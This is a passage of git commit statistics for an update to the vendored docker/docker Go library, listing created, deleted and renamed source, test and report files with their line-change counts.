 .../docker/docker/reports/2017-06-12.md       |   78 +
 .../docker/docker/reports/2017-06-26.md       |  120 +
 .../docker/reports/builder/2017-05-01.md      |   47 +
 .../docker/reports/builder/2017-05-08.md      |   57 +
 .../docker/reports/builder/2017-05-15.md      |   64 +
 .../docker/reports/builder/2017-05-22.md      |   47 +
 .../docker/reports/builder/2017-05-29.md      |   52 +
 .../docker/reports/builder/2017-06-05.md      |   58 +
 .../docker/reports/builder/2017-06-12.md      |   58 +
 .../docker/reports/builder/2017-06-26.md      |   78 +
 .../docker/reports/builder/2017-07-10.md      |   65 +
 .../docker/reports/builder/2017-07-17.md      |   79 +
 .../docker/restartmanager/restartmanager.go   |   15 +-
 .../restartmanager/restartmanager_test.go     |   16 +-
 .../docker/docker/runconfig/config.go         |   50 +-
 .../docker/docker/runconfig/config_test.go    |   75 +-
 .../docker/docker/runconfig/config_unix.go    |    4 +-
 .../docker/docker/runconfig/config_windows.go |    2 +-
 .../docker/docker/runconfig/errors.go         |   50 +-
 .../docker/docker/runconfig/hostconfig.go     |   52 +-
 .../docker/runconfig/hostconfig_solaris.go    |   41 -
 .../docker/runconfig/hostconfig_test.go       |   84 +-
 .../docker/runconfig/hostconfig_unix.go       |   79 +-
 .../docker/runconfig/hostconfig_windows.go    |   62 +-
 .../runconfig/hostconfig_windows_test.go      |   17 +
 .../docker/docker/runconfig/opts/envfile.go   |   81 -
 .../docker/runconfig/opts/envfile_test.go     |  142 -
 .../docker/runconfig/opts/fixtures/utf16.env  |  Bin 54 -> 0 bytes
 .../runconfig/opts/fixtures/utf16be.env       |  Bin 54 -> 0 bytes
 .../docker/runconfig/opts/fixtures/utf8.env   |    3 -
 .../docker/runconfig/opts/fixtures/valid.env  |    1 -
 .../runconfig/opts/fixtures/valid.label       |    1 -
 .../docker/docker/runconfig/opts/opts.go      |   83 -
 .../docker/docker/runconfig/opts/opts_test.go |  113 -
 .../docker/docker/runconfig/opts/parse.go     |  977 +--
 .../docker/runconfig/opts/parse_test.go       |  894 ---
 .../docker/runconfig/opts/throttledevice.go   |  111 -
 .../docker/runconfig/opts/weightdevice.go     |   89 -
 .../github.com/docker/docker/utils/debug.go   |   26 -
 .../docker/docker/utils/process_windows.go    |   20 -
 .../docker/utils/templates/templates.go       |   42 -
 .../docker/utils/templates/templates_test.go  |   38 -
 .../github.com/docker/docker/utils/utils.go   |   87 -
 vendor/github.com/docker/docker/vendor.conf   |  164 +-
 .../docker/docker/volume/drivers/adapter.go   |   73 +-
 .../docker/docker/volume/drivers/extpoint.go  |  218 +-
 .../docker/volume/drivers/extpoint_test.go    |    9 +-
 .../docker/docker/volume/drivers/proxy.go     |   33 +-
 .../docker/volume/drivers/proxy_test.go       |    2 +-
 .../docker/docker/volume/local/local.go       |  116 +-
 .../docker/docker/volume/local/local_test.go  |   73 +-
 .../docker/docker/volume/local/local_unix.go  |   16 +-
 .../docker/volume/local/local_windows.go      |   14 +-
 .../docker/volume/mounts/lcow_parser.go       |   34 +
 .../docker/volume/mounts/linux_parser.go      |  417 ++
 .../docker/docker/volume/mounts/mounts.go     |  170 +
 .../docker/docker/volume/mounts/parser.go     |   47 +
 .../docker/volume/mounts/parser_test.go       |  480 ++
 .../docker/docker/volume/mounts/validate.go   |   28 +
 .../docker/volume/mounts/validate_test.go     |   73 +
 .../validate_unix_test.go}                    |    2 +-
 .../validate_windows_test.go}                 |    2 +-
 .../docker/volume/{ => mounts}/volume_copy.go |    6 +-
 .../docker/volume/mounts/volume_unix.go       |   18 +
 .../docker/volume/mounts/volume_windows.go    |    8 +
 .../docker/volume/mounts/windows_parser.go    |  456 ++
 .../docker/docker/volume/service/by.go        |   89 +
 .../docker/docker/volume/service/convert.go   |  132 +
 .../docker/volume/{store => service}/db.go    |   15 +-
 .../docker/docker/volume/service/db_test.go   |   52 +
 .../docker/volume/service/default_driver.go   |   21 +
 .../volume/service/default_driver_stubs.go    |   10 +
 .../volume/{store => service}/errors.go       |   59 +-
 .../docker/docker/volume/service/opts/opts.go |   89 +
 .../volume/{store => service}/restore.go      |   14 +-
 .../docker/volume/service/restore_test.go     |   58 +
 .../docker/docker/volume/service/service.go   |  243 +
 .../volume/service/service_linux_test.go      |   66 +
 .../docker/volume/service/service_test.go     |  253 +
 .../docker/volume/{store => service}/store.go |  581 +-
 .../docker/volume/service/store_test.go       |  421 ++
 .../docker/volume/service/store_unix.go       |    9 +
 .../{store => service}/store_windows.go       |    6 +-
 .../docker/docker/volume/store/store_test.go  |  234 -
 .../docker/docker/volume/store/store_unix.go  |    9 -
 .../docker/volume/testutils/testutils.go      |  119 +-
 .../docker/docker/volume/validate.go          |  125 -
 .../docker/docker/volume/validate_test.go     |   43 -
 .../github.com/docker/docker/volume/volume.go |  264 +-
 .../docker/docker/volume/volume_copy_unix.go  |    8 -
 .../docker/volume/volume_copy_windows.go      |    6 -
 .../docker/docker/volume/volume_linux.go      |   56 -
 .../docker/docker/volume/volume_linux_test.go |   51 -
 .../docker/volume/volume_propagation_linux.go |   47 -
 .../volume/volume_propagation_linux_test.go   |   65 -
 .../volume/volume_propagation_unsupported.go  |   24 -
 .../docker/docker/volume/volume_test.go       |  269 -
 .../docker/docker/volume/volume_unix.go       |  138 -
 .../docker/volume/volume_unsupported.go       |   16 -
 .../docker/docker/volume/volume_windows.go    |  201 -
 2656 files changed, 107914 insertions(+), 137977 deletions(-)
 create mode 100644 vendor/github.com/docker/docker/.DEREK.yml
 create mode 100644 vendor/github.com/docker/docker/.github/CODEOWNERS
 delete mode 100644 vendor/github.com/docker/docker/Dockerfile.aarch64
 delete mode 100644 vendor/github.com/docker/docker/Dockerfile.armhf
 create mode 100644 vendor/github.com/docker/docker/Dockerfile.e2e
 delete mode 100644 vendor/github.com/docker/docker/Dockerfile.ppc64le
 delete mode 100644 vendor/github.com/docker/docker/Dockerfile.s390x
 delete mode 100644 vendor/github.com/docker/docker/Dockerfile.solaris
 create mode 100644 vendor/github.com/docker/docker/TESTING.md
 delete mode 100644 vendor/github.com/docker/docker/VERSION
 delete mode 100644 vendor/github.com/docker/docker/api/common_test.go
 delete mode 100644 vendor/github.com/docker/docker/api/errors/errors.go
 create mode 100644 vendor/github.com/docker/docker/api/server/backend/build/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/server/backend/build/tag.go
 create mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils_test.go
 delete mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go
 create mode 100644 vendor/github.com/docker/docker/api/server/httputils/write_log_stream.go
 create mode 100644 vendor/github.com/docker/docker/api/server/middleware/debug_test.go
 delete mode 100644 vendor/github.com/docker/docker/api/server/profiler.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/debug/debug.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/debug/debug_routes.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/distribution/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/distribution/distribution.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/distribution/distribution_routes.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/network/filter_test.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/session/backend.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/session/session.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/session/session_routes.go
 create mode 100644 vendor/github.com/docker/docker/api/server/router/swarm/helpers.go
 create mode 100644 vendor/github.com/docker/docker/api/types/backend/build.go
 create mode 100644 vendor/github.com/docker/docker/api/types/container/container_changes.go
 create mode 100644 vendor/github.com/docker/docker/api/types/container/container_top.go
 create mode 100644 vendor/github.com/docker/docker/api/types/container/waitcondition.go
 create mode 100644 vendor/github.com/docker/docker/api/types/filters/example_test.go
 create mode 100644 vendor/github.com/docker/docker/api/types/graph_driver_data.go
 create mode 100644 vendor/github.com/docker/docker/api/types/image/image_history.go
 create mode 100644 vendor/github.com/docker/docker/api/types/image_delete_response_item.go
 create mode 100644 vendor/github.com/docker/docker/api/types/plugins/logdriver/entry.pb.go
 create mode 100644 vendor/github.com/docker/docker/api/types/plugins/logdriver/entry.proto
 create mode 100644 vendor/github.com/docker/docker/api/types/plugins/logdriver/gen.go
 create mode 100644 vendor/github.com/docker/docker/api/types/plugins/logdriver/io.go
 delete mode 100644 vendor/github.com/docker/docker/api/types/reference/image_reference.go
 delete mode 100644 vendor/github.com/docker/docker/api/types/reference/image_reference_test.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/config.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/runtime.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/runtime/gen.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/runtime/plugin.pb.go
 create mode 100644 vendor/github.com/docker/docker/api/types/swarm/runtime/plugin.proto
 rename vendor/github.com/docker/docker/api/types/volume/{volumes_create.go => volume_create.go} (84%)
 rename vendor/github.com/docker/docker/api/types/volume/{volumes_list.go => volume_list.go} (78%)
 create mode 100644 vendor/github.com/docker/docker/builder/builder-next/adapters/containerimage/pull.go
 create mode 100644 vendor/github.com/docker/docker/builder/builder-next/adapters/snapshot/layer.go
 create mode 100644 vendor/github.com/docker/docker/builder/builder-next/adapters/snapshot/snapshot.go
 create mode 100644 vendor/github.com/docker/docker/builder/builder-next/builder.go
 create mode 100644 vendor/github.com/docker/docker/builder/builder-next/controller.go
 create mode 100644 vendor/github.com/docker/docker/builder/builder-next/executor_unix.go
 create mode 100644 vendor/github.com/docker/docker/builder/builder-next/executor_windows.go
 create mode 100644 vendor/github.com/docker/docker/builder/builder-next/exporter/export.go
 create mode 100644 vendor/github.com/docker/docker/builder/builder-next/exporter/writer.go
 create mode 100644 vendor/github.com/docker/docker/builder/builder-next/reqbodyhandler.go
 create mode 100644 vendor/github.com/docker/docker/builder/builder-next/worker/worker.go
 delete mode 100644 vendor/github.com/docker/docker/builder/context.go
 delete mode 100644 vendor/github.com/docker/docker/builder/context_test.go
 delete mode 100644 vendor/github.com/docker/docker/builder/context_unix.go
 delete mode 100644 vendor/github.com/docker/docker/builder/context_windows.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/bflag.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/buildargs.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/buildargs_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/clientsession.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/command/command.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/containerbackend.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/copy.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/copy_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/copy_unix.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/copy_windows.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/envVarTest
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/imagecontext.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/imageprobe.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_linux.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/metrics.go
 create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/mockbackend_test.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/support.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/support_test.go
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/wordsTest
 delete mode 100644 vendor/github.com/docker/docker/builder/dockerignore.go
 create mode 100644 vendor/github.com/docker/docker/builder/fscache/fscache.go
 create mode 100644 vendor/github.com/docker/docker/builder/fscache/fscache_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/fscache/naivedriver.go
 delete mode 100644 vendor/github.com/docker/docker/builder/git.go
 delete mode 100644 vendor/github.com/docker/docker/builder/remote.go
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/archive.go
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/detect.go
 rename vendor/github.com/docker/docker/builder/{dockerignore_test.go => remotecontext/detect_test.go} (58%)
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/filehash.go
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/generate.go
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/git.go
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/git/gitutils.go
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/git/gitutils_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/lazycontext.go
 rename vendor/github.com/docker/docker/{pkg/httputils => builder/remotecontext}/mimetype.go (63%)
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/mimetype_test.go
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/remote.go
 rename vendor/github.com/docker/docker/builder/{ => remotecontext}/remote_test.go (62%)
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/tarsum.go
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/tarsum.pb.go
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/tarsum.proto
 create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/tarsum_test.go
 rename vendor/github.com/docker/docker/builder/{ => remotecontext}/utils_test.go (66%)
 delete mode 100644 vendor/github.com/docker/docker/builder/tarsum.go
 delete mode 100644 vendor/github.com/docker/docker/builder/tarsum_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/create.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/list.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/remove.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/cli.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/commands/commands.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/attach.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/cmd.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/commit.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/cp.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/create.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/diff.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/exec.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/exec_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/export.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/hijack.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/inspect.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/kill.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/list.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/logs.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/pause.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/port.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/prune.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/ps_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/rename.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/restart.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/rm.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/run.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/start.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/stats.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/stats_helpers.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/stop.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/top.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/tty.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/unpause.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/update.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/utils.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/container/wait.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/events_utils.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/container.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/container_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/custom.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/custom_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/formatter.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/image.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/image_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/network.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/network_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/reflect.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/service.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/stats.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/stats_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/volume.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/volume_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/build.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/cmd.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/history.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/import.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/inspect.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/list.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/load.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/prune.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/pull.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/push.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/remove.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/save.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/tag.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/trust.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/image/trust_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/in.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/inspect/inspector.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/network/cmd.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/network/connect.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/network/create.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/network/disconnect.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/network/inspect.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/network/list.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/network/prune.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/network/remove.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/node/cmd.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/node/demote.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/node/inspect.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/node/list.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/node/opts.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/node/promote.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/node/ps.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/node/remove.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/node/update.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/out.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/cmd.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/create.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/disable.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/enable.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/inspect.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/install.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/list.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/push.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/remove.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/set.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/upgrade.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/prune/prune.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/registry.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/registry/login.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/registry/logout.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/registry/search.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/cmd.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/create.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/inspect.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/ls.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/remove.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/utils.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/cmd.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/create.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/inspect.go
 delete mode 100644 vendor/github.com/docker/docker/cli/command/service/inspect_test.go
